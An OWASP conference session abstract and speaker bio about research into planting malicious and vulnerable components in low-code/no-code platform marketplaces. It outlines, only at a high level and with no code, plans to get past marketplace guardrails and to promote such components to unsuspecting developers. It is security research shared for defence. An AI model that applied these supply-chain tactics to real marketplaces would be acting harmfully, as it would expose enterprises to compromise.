Slides: static.sched.c...
Our research explores the possibility of spreading malware and launching supply chain attacks through the marketplace functionality of leading Low Code / No Code application development platforms. Low-Code/No-Code (LCNC) platforms are quickly becoming the go-to technology for building enterprise applications. As the usage of these platforms becomes widespread, they all adopt some type of code reuse and code sharing mechanism using a marketplace approach. Whether it’s Forge for Outsystems, AppSource for Microsoft PowerApps or the UiPath Marketplace - all platforms adopted the concept of allowing app developers to get a head start (or completely rely on) by taking content created and publicly shared by other developers. Introducing applications that are based on marketplace components and templates exposes an enterprise to two types of threats: malicious (no) code and vulnerabilities.
The first involves a threat actor that creates a component with intentional, undesired, functionality. The component is then placed into the marketplace by the threat actor. When developers introduce the malicious component / application into their LCNC environment the malicious functionality is executed in the context of enterprise permissions, providing the attacker internal access into data and machines.
The second threat pertains to applications and components that were shared through the marketplace without thorough security review. These components contain security vulnerabilities and when introduced by developers into the organization’s LCNC environment expose enterprise data to these same vulnerabilities. The two threats are imminent in the LCNC domain as there are very few tools and practices for weaving out security vulnerabilities from no-code applications and even fewer to detect the existence of undesired, malicious, functionality.
The session discusses and demonstrates our attempts to introduce vulnerable and malicious components into the marketplace of various LCNC platforms. We will show what worked and what didn’t and also discuss methods that could be used to overcome existing guardrails. We will also discuss methods to promote the use of our malicious or vulnerable components and applications in a way that increases the chances of them being used by unsuspecting developers. This session will include demonstrations of some potential outcomes of malicious and vulnerable LCNC components.
Amichai Shulman
Nokod Security
CTO and co-founder
Amichai Shulman is the CTO and co-founder of Nokod Security. He is a cyber security researcher, entrepreneur and investor with more than 30 years of cyber security experience in military, government and commercial environments. He co-founded Imperva in 2002 and served as CTO for the company for over 15 years, driving innovation and thought leadership. For the past 20 years Amichai has been involved in leading innovation in the cyber security industry through research. He is a frequent speaker in top tier conferences including RSAC, Infosec and BlackHat and OWASP Appsec and his research and commentary gets regularly published in industry magazines such as The Register, Dark Reading and even general press such as New York Times. As a seed investor and advisor, Amichai successfully accompanied a number of startup companies (including Intsights, SkyFence, Lacoon and Indegy) and is currently also an advisor and board member for a number of cyber security startup companies. Amichai is also an Adjunct Teacher in the Technion Institute of Technology where he teaches cyber security for graduate and undergraduate college students and conducts independent research. Amichai holds a B.Sc and M.Sc in Computer Science.
Managed by the OWASP® Foundation
owasp.org/
28 янв 2024
